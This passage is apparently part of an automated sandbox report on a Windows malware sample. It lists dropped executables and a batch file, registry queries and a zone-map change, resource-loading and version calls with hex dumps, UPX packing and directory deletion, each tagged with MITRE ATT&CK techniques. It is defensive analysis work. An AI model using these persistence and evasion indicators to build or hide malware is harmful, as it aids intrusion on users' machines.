\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\_vslite.bat\"\n \"meorm.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\lojebo.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ywrej.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%TEMP%\\ywrej.exe]- [targetUID: 00000000-00003636]\n \"_vslite.bat\" has type \"ASCII text with CRLF line terminators\"- Location: [%TEMP%\\_vslite.bat]- [targetUID: 00000000-00003636]\n \"dism.log\" has type \"Unicode text UTF-8 (with BOM) text with very long lines (312) with CRLF line terminators\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A48065.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"golfinfo.ini\" has type \"Non-ISO extended-ASCII text with very long lines (512) with no line terminators\"- Location: [%TEMP%\\golfinfo.ini]- [targetUID: 00000000-00003636]\n \"gbp.ini\" has type \"ISO-8859 text with no line terminators\"- Location: [%TEMP%\\gbp.ini]- [targetUID: 00000000-00003636]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"meorm.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"meorm.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"meorm.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"lojebo.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"lojebo.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"lojebo.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\RPC\"; Key: \"MAXRPCSIZE\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"OOBEINPROGRESS\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\SETUP\"; Key: \"SYSTEMSETUPINPROGRESS\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"meorm.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"lojebo.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"ywrej.exe\" called \"FindResourceW\" with parameter \"23735372\" - (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00005832)\n \"meorm.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00006120)\n \"meorm.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15784020'}\" (UID: 00000000-00006120)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598520'}\" (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598360'}\" (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598536'}\" (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '15598488'}\" (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '2086996'}\" (UID: 00000000-00003636)\n \"lojebo.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '2087028'}\" (UID: 00000000-00003636)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864912'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861600'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864952'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861640'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5864992'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861680'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865032'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861720'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5865112'}\" (UID: 00000000-00001924)\n \"ywrej.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5861800'}\" (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-121", "type": 6, "relevance": 3, "name": "Calls an API typically used to remove a directory", "description": "\"cmd.exe\" called \"RemoveDirectoryW\" with parameter 43003a00 (UID: 00000000-00004296)\n \"cmd.exe\" called \"RemoveDirectoryW\" with parameter %LOCALAPPDATA%\\Temp (UID: 00000000-00001552)", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".text\" is zero\n Raw size of \".?xL\" is zero\n Raw size of \".reloc\" is zero\n Raw size of \".htext\" is zero\n Raw size of \".-(H\" is zero\n Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000034006100620030003400650037006500370031003200640036003400650063003900310062003000630030006300380064006600330036003800390038003400340061003400370066003900610030003200640065006500300061003800310034002e00650078006500000000000000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3b7550c030000060fd7f9a5c197700f0fd7fb0aa12004460fd7f00000000400000003f0000001d0000000060fd7fa4aa1200c15c1977608220771d0000000060fd7f9a5c197700f0fd7fc8aa1200578918778083207713173175d8eb3b75 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"meorm.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100003500420032002d0038004200380044002d00320045003500450031004400350032003200360034003900000010000010a8450000f83d2900c400260065007200760065000d00000da4450000f83d2900c400260072000000780070006c006f007200650009000009a4450000f83d2900 (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3b7580762a0000b0fd7f9a5c197700f0fd7f10bf120044b0fd7f00000000400000003f0000001d00000000b0fd7f04bf1200c15c1977608220771d00000000b0fd7f9a5c197700f0fd7f28bf1200578918778083207713173175d8eb3b75 (UID: 00000000-00006120)\n \"meorm.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006120)\n \"lojebo.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100007000700044006100740061005c004c006f00630061006c005c00540065006d0070005c006c006f006a00650062006f002e006500780065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb3b75e0b60e0100b0fd7f9a5c197700f0fd7fa0c2120044b0fd7f00000000400000003f0000001f00000000b0fd7f94c21200c15c1977608220771f00000000b0fd7f9a5c197700f0fd7fb8c21200578918778083207713173175d8eb3b75 (UID: 00000000-00003636)\n \"lojebo.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003636)\n \"ywrej.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000044f4120002000000000000001000000084f31200a0f31200c976307500002b0000001400da7630757461a570000000000000ee6901000000935c197700000000000000000000000068f312000100000038f61200bd06327534e4870500000000bd14ee6938c82e00 (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"meorm.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006120)\n \"lojebo.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003636)\n \"ywrej.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"ywrej.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00001924)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-138", "type": 3, "relevance": 1, "name": "Queries for Borland Delphi related registry entry", "description": "\"ywrej.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\BORLAND\\DELPHI\\LOCALES\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00000000007c012d00000000002e0000000000000050012d0042000000e84e300000000000420000000000000014000000000000000000000000000000000000000000000002000002d8bd2f002f02002d0000000000000000000000008000000000000000202a000a683a30000100000000000000020000000c00000070af2f0070af2f006baf2f00000000000000000000002d0000000001a0fd12000000000078ff120095e114770c2d3700feffffff435c18775059187794000000a00000006aaf2f0068af2f009400000000000000fdfeaa7600000000180000003daed98d (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036007acda98d48bf12006d82a075c41b310004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310034006100620030003400650037006500370031003200640036003400650063003900310062003000630030006300380064006600330036003800390038003400340061003400370066003900610030003200640065006500300061003800310034002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b1877d4963d77d8eb3b75ac012d0000002d0000000000000000000400e80010090000000000000000000000000000000000000500e300100900000000000000000000606f2d0000000000200000000000000000000000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075041a340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075241c340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d009225000094b8120067e5157700002d00502334000000000000002d000000000050233400000000003e25001b80000000f8253400c4002d00685d3300003b000000002d000000000050233400a010000000002d0048203400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075cc1d340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d005d25000094b8120067e5157700002d00f82434000000000000002d0000000000f8243400000000000925002c80000000a0273400c4002d00f05c3300003b000000002d0000000000f8243400a010000000002d00f0213400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075fc1e340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d003725000094b8120067e5157700002d00282634000000000000002d00000000002826340000000000e32400c780000000d0283400c4002d00f05c3300003b000000002d000000000028263400a010000000002d0020233400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a0752c20340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d001125000094b8120067e5157700002d00582734000000000000002d00000000005827340000000000bd24009980000000002a3400c4002d00585d3300003b000000002d000000000058273400a010000000002d0050243400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a0755421340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d00ec24000094b8120067e5157700002d00802834000000000000002d00000000008028340000000000982400bc80000000282b3400c4002d00f05c3300003b000000002d000000000080283400a010000000002d0078253400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a0758422340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d00c624000094b8120067e5157700002d00b02934000000000000002d0000000000b0293400000000007224005680000000582c3400c4002d00585d3300003b000000002d0000000000b0293400a010000000002d00a8263400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075b423340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003400f83b0000ff07000000002d00000000007f070000c4002d00302f2d00a024000094b8120067e5157700002d00e02a34000000000000002d0000000000e02a3400000000004c24006880000000882d3400c4002d00585d3300003b000000002d0000000000e02a3400a010000000002d00d8273400f83b0000ff07000000002d00000000007f070000c4002d007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360056cba98d24b912006d82a075dc24340004010000 (UID: 00000000-00005832)\n \"f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe\" called \"RtlGetVersion\" with parameter 